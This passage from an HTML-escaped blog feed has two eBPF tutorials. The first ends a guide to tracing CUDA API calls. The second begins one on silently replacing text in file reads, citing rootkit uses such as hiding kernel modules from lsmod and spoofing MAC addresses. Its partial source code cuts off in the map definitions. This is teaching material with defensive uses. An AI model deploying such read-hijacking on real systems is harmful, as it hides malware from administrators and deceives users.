            &lt;span class="n"&gt;snprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;details&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;len&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"returned=%s"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cuda_error_str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;ret_val&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
        &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="cm"&gt;/* Similar cases for other event types... */&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This function handles each event type differently. For example, a malloc event shows the requested size on entry and the error code on exit.&lt;/p&gt;

&lt;p&gt;The main event loop is remarkably simple:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;exiting&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ring_buffer__poll&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;rb&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;100&lt;/span&gt; &lt;span class="cm"&gt;/* timeout, ms */&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="cm"&gt;/* Error handling... */&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This polls the ring buffer for events, calling &lt;code&gt;handle_event&lt;/code&gt; for each one. The 100ms timeout ensures the program remains responsive to signals like Ctrl+C.&lt;/p&gt;

&lt;h2&gt;
  
  
  CUDA Error Handling and Reporting
&lt;/h2&gt;

&lt;p&gt;An important aspect of our tracer is translating CUDA error codes into human-readable messages. CUDA has over 100 different error codes, from simple ones like "out of memory" to complex ones like "unsupported PTX version."&lt;/p&gt;

&lt;p&gt;Our tool includes a comprehensive &lt;code&gt;cuda_error_str&lt;/code&gt; function that maps these numeric codes to string descriptions:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="nf"&gt;cuda_error_str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;error&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;switch&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;error&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;case&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;  &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="s"&gt;"Success"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;case&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;  &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="s"&gt;"InvalidValue"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;case&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;  &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="s"&gt;"OutOfMemory"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="cm"&gt;/* Many more error codes... */&lt;/span&gt;
    &lt;span class="nl"&gt;default:&lt;/span&gt; &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="s"&gt;"Unknown"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This makes the output much more useful for debugging. Instead of seeing "error 2", you'll see "OutOfMemory", which immediately tells you what went wrong.&lt;/p&gt;

&lt;h2&gt;
  
  
  Compilation and Execution
&lt;/h2&gt;

&lt;p&gt;Building the tracer is straightforward with the provided Makefile:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Build both the tracer and the example&lt;/span&gt;
make
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This creates two binaries:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;cuda_events&lt;/code&gt;: The eBPF-based CUDA tracing tool&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;basic02&lt;/code&gt;: A simple CUDA example application&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The build system is smart enough to detect your GPU architecture using &lt;code&gt;nvidia-smi&lt;/code&gt; and compile the CUDA code with the appropriate flags.&lt;/p&gt;

&lt;p&gt;Running the tracer is just as easy:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Start the tracing tool&lt;/span&gt;
&lt;span class="nb"&gt;sudo&lt;/span&gt; ./cuda_events &lt;span class="nt"&gt;-p&lt;/span&gt; ./basic02

&lt;span class="c"&gt;# In another terminal, run the CUDA example&lt;/span&gt;
./basic02
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You can also trace a specific process by PID:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Run the CUDA example&lt;/span&gt;
./basic02 &amp;amp;
&lt;span class="nv"&gt;PID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;$!&lt;/span&gt;

&lt;span class="c"&gt;# Start the tracing tool with PID filtering&lt;/span&gt;
&lt;span class="nb"&gt;sudo&lt;/span&gt; ./cuda_events &lt;span class="nt"&gt;-p&lt;/span&gt; ./basic02 &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="nv"&gt;$PID&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The example output shows detailed information about each CUDA operation:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Using CUDA library: ./basic02
TIME     PROCESS          PID     EVENT                 TYPE    DETAILS
17:35:41 basic02          12345   cudaMalloc          [ENTER]  size=4000 bytes
17:35:41 basic02          12345   cudaMalloc           [EXIT]  returned=Success
17:35:41 basic02          12345   cudaMalloc          [ENTER]  size=4000 bytes
17:35:41 basic02          12345   cudaMalloc           [EXIT]  returned=Success
17:35:41 basic02          12345   cudaMemcpy          [ENTER]  size=4000 bytes, kind=1
17:35:41 basic02          12345   cudaMemcpy           [EXIT]  returned=Success
17:35:41 basic02          12345   cudaLaunchKernel    [ENTER]  func=0x7f1234567890
17:35:41 basic02          12345   cudaLaunchKernel     [EXIT]  returned=Success
17:35:41 basic02          12345   cudaMemcpy          [ENTER]  size=4000 bytes, kind=2
17:35:41 basic02          12345   cudaMemcpy           [EXIT]  returned=Success
17:35:41 basic02          12345   cudaFree            [ENTER]  ptr=0x7f1234568000
17:35:41 basic02          12345   cudaFree             [EXIT]  returned=Success
17:35:41 basic02          12345   cudaFree            [ENTER]  ptr=0x7f1234569000
17:35:41 basic02          12345   cudaFree             [EXIT]  returned=Success
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This output shows the typical flow of a CUDA application:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Allocate memory on the device&lt;/li&gt;
&lt;li&gt;Copy data from host to device (kind=1)&lt;/li&gt;
&lt;li&gt;Launch a kernel to process the data&lt;/li&gt;
&lt;li&gt;Copy results back from device to host (kind=2)&lt;/li&gt;
&lt;li&gt;Free device memory&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  benchmark
&lt;/h2&gt;

&lt;p&gt;We also provide a benchmark tool to test the performance of the tracer and the latency of the CUDA API calls.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;make
&lt;span class="nb"&gt;sudo&lt;/span&gt; ./cuda_events &lt;span class="nt"&gt;-p&lt;/span&gt; ./bench
./bench
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;When there is no tracing, the result is like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Data size: 1048576 bytes (1024 KB)
Iterations: 10000

Summary (average time per operation):
-----------------------------------
cudaMalloc:           113.14 µs
cudaMemcpyH2D:        365.85 µs
cudaLaunchKernel:       7.82 µs
cudaMemcpyD2H:        393.55 µs
cudaFree:               0.00 µs
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;When the tracer is attached, the result is like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Data size: 1048576 bytes (1024 KB)
Iterations: 10000

Summary (average time per operation):
-----------------------------------
cudaMalloc:           119.81 µs
cudaMemcpyH2D:        367.16 µs
cudaLaunchKernel:       8.77 µs
cudaMemcpyD2H:        383.66 µs
cudaFree:               0.00 µs
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The tracer adds about 2us overhead to each CUDA API call, which is negligible for most cases. To further reduce the overhead, you can try using the &lt;a href="https://github.com/eunomia-bpf/bpftime" rel="noopener noreferrer"&gt;bpftime&lt;/a&gt; userspace runtime to optimize the eBPF program.&lt;/p&gt;

&lt;h2&gt;
  
  
  Command Line Options
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;cuda_events&lt;/code&gt; tool supports these options:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;-v&lt;/code&gt;: Enable verbose output for debugging&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;-t&lt;/code&gt;: Don't print timestamps&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;-r&lt;/code&gt;: Don't show function returns (only show function entries)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;-p PATH&lt;/code&gt;: Specify the path to the CUDA runtime library or application&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;-d PID&lt;/code&gt;: Trace only the specified process ID&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Next Steps
&lt;/h2&gt;

&lt;p&gt;Once you're comfortable with this basic CUDA tracing tool, you could extend it to:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Add support for more CUDA API functions&lt;/li&gt;
&lt;li&gt;Add timing information to analyze performance bottlenecks&lt;/li&gt;
&lt;li&gt;Implement correlation between related operations (e.g., matching mallocs with frees)&lt;/li&gt;
&lt;li&gt;Create visualizations of CUDA operations for easier analysis&lt;/li&gt;
&lt;li&gt;Add support for other GPU frameworks like OpenCL or ROCm&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;For more detail about the cuda example and tutorial, you can checkout out repo and the code in &lt;a href="https://github.com/eunomia-bpf/basic-cuda-tutorial" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/basic-cuda-tutorial&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The code of this tutorial is in &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/47-cuda-events" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/47-cuda-events&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;CUDA Programming Guide: &lt;a href="https://docs.nvidia.com/cuda/cuda-c-programming-guide/" rel="noopener noreferrer"&gt;https://docs.nvidia.com/cuda/cuda-c-programming-guide/&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;NVIDIA CUDA Runtime API: &lt;a href="https://docs.nvidia.com/cuda/cuda-runtime-api/" rel="noopener noreferrer"&gt;https://docs.nvidia.com/cuda/cuda-runtime-api/&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;libbpf Documentation: &lt;a href="https://libbpf.readthedocs.io/" rel="noopener noreferrer"&gt;https://libbpf.readthedocs.io/&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Linux uprobes Documentation: &lt;a href="https://www.kernel.org/doc/Documentation/trace/uprobetracer.txt" rel="noopener noreferrer"&gt;https://www.kernel.org/doc/Documentation/trace/uprobetracer.txt&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;eGPU: eBPF on GPUs: &lt;a href="https://dl.acm.org/doi/10.1145/3723851.3726984" rel="noopener noreferrer"&gt;https://dl.acm.org/doi/10.1145/3723851.3726984&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;bpftime GPU Examples: &lt;a href="https://github.com/eunomia-bpf/bpftime/tree/master/example/gpu" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpftime/tree/master/example/gpu&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;If you'd like to dive deeper into eBPF, check out our tutorial repository at &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial&lt;/a&gt; or visit our website at &lt;a href="https://eunomia.dev/tutorials/" rel="noopener noreferrer"&gt;https://eunomia.dev/tutorials/&lt;/a&gt;.&lt;/p&gt;

</description>
      <category>ebpf</category>
      <category>cuda</category>
      <category>gpu</category>
    </item>
    <item>
      <title>eBPF Tutorial: Transparent Text Replacement in File Reads</title>
      <dc:creator>云微</dc:creator>
      <pubDate>Tue, 23 Dec 2025 07:17:34 +0000</pubDate>
      <link>https://forem.com/yunwei37/ebpf-tutorial-transparent-text-replacement-in-file-reads-3fm7</link>
      <guid>https://forem.com/yunwei37/ebpf-tutorial-transparent-text-replacement-in-file-reads-3fm7</guid>
      <description>&lt;p&gt;When you read a file in Linux, you trust that what you see matches what's stored on disk. But what if the kernel itself was lying to you? This tutorial demonstrates how eBPF programs can intercept file read operations and silently replace text before applications ever see it—creating a powerful capability for both defensive security monitoring and offensive rootkit techniques.&lt;/p&gt;

&lt;p&gt;Unlike traditional file modification that leaves traces in timestamps and audit logs, this approach manipulates data in-flight during the read system call. The file on disk remains untouched, yet every program reading it sees modified content. This technique has legitimate uses in security research, honeypot deployment, and anti-malware deception, but also reveals how rootkits can hide their presence from system administrators.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;The complete source code: &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/27-replace" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/27-replace&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Use Cases: From Security to Deception
&lt;/h2&gt;

&lt;p&gt;Text replacement in file reads serves several purposes across the security spectrum. For defenders, it enables honeypot systems that present fake credentials to attackers, or deception layers that make malware believe it's succeeded when it hasn't. Security researchers use it to study malware behavior by feeding controlled data to suspicious processes.&lt;/p&gt;

&lt;p&gt;On the offensive side, rootkits use this exact technique to hide their presence. The classic example is hiding kernel modules from &lt;code&gt;lsmod&lt;/code&gt; by replacing their names in &lt;code&gt;/proc/modules&lt;/code&gt; with whitespace or other module names. Malware can spoof MAC addresses by modifying reads from &lt;code&gt;/sys/class/net/*/address&lt;/code&gt;, defeating sandbox detection that looks for virtual machine identifiers.&lt;/p&gt;

&lt;p&gt;The key insight is that this operates at the system call boundary—after the kernel reads the file but before the userspace process sees the data. No matter how many times you &lt;code&gt;cat&lt;/code&gt; the file or open it in different editors, you'll always see the modified version, because the eBPF program intercepts every read operation.&lt;/p&gt;

&lt;h2&gt;
  
  
  Architecture: Multi-Stage Text Scanning and Replacement
&lt;/h2&gt;

&lt;p&gt;This implementation is more sophisticated than simple string replacement. The challenge is working within eBPF's constraints: limited stack size, no unbounded loops, and strict verifier checks. To handle arbitrarily large files and multiple matches, the program uses a three-stage approach with tail calls to chain eBPF programs together.&lt;/p&gt;

&lt;p&gt;The first stage (&lt;code&gt;find_possible_addrs&lt;/code&gt;) scans through the read buffer looking for characters that match the first character of our search string. It can't do full string matching yet due to complexity limits, so it just marks potential locations. These addresses are stored in &lt;code&gt;map_name_addrs&lt;/code&gt; for the next stage.&lt;/p&gt;

&lt;p&gt;The second stage (&lt;code&gt;check_possible_addresses&lt;/code&gt;) is tail-called from the first. It examines each potential match location and performs full string comparison using &lt;code&gt;bpf_strncmp&lt;/code&gt;. This verifies whether we actually found our target text. Confirmed matches go into &lt;code&gt;map_to_replace_addrs&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;The third stage (&lt;code&gt;overwrite_addresses&lt;/code&gt;) loops through confirmed match locations and uses &lt;code&gt;bpf_probe_write_user&lt;/code&gt; to overwrite the text with the replacement string. Because both strings must be the same length (to avoid shifting memory and corrupting the buffer), users must pad their replacement text to match.&lt;/p&gt;

&lt;p&gt;This pipeline handles the verifier's complexity limits by splitting the work across multiple programs, each staying under the instruction count threshold. Tail calls provide the glue, allowing one program to pass control to the next with the same context.&lt;/p&gt;

&lt;h2&gt;
  
  
  Implementation Details
&lt;/h2&gt;

&lt;p&gt;Let's examine the complete eBPF code that implements this three-stage pipeline:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="c1"&gt;// SPDX-License-Identifier: BSD-3-Clause&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;"vmlinux.h"&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf_helpers.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf_tracing.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf_core_read.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;"replace.h"&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;LICENSE&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"license"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"Dual BSD/GPL"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="c1"&gt;// Ringbuffer Map to pass messages from kernel to user&lt;/span&gt;
&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_MAP_TYPE_RINGBUF&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_entries&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;256&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mi"&gt;1024&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;rb&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".maps"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="c1"&gt;// Map to hold the File Descriptors from 'openat' calls&lt;/span&gt;
&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_MAP_TYPE_HASH&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_entries&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;8192&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;size_t&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;map_fds&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".maps"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="c1"&gt;// Map to fold the buffer sized from 'read' calls&lt;/span&gt;
&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_MAP_TYPE_HASH&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_entries&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;8192&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;size_t&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;map_buff_addrs&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".maps"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="c1"&gt;// Map to fold the buffer sized from 'read' calls&lt;/span&gt;
&lt;span class="c1"&gt;// NOTE: This should probably be a map-of-maps, with the top-level&lt;/span&gt;
&lt;span class="c1"&gt;// key bing pid_tgid, so we know we're looking at the right program&lt;/span&gt;
&lt;span class="cp"&gt;#define MAX_POSSIBLE_ADDRS 500
&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_MAP_TYPE_ARRAY&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_entries&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;MAX_POSSIBLE_ADDRS&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;map_name_addrs&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".maps"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_MAP_TYPE_ARRAY&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_entries&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;MAX_POSSIBLE_ADDRS&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;map_to_replace_addrs&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".maps"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="c1"&gt;// Map holding the programs for tail calls&lt;/span&gt;
&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_MAP_TYPE_PROG_ARRAY&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
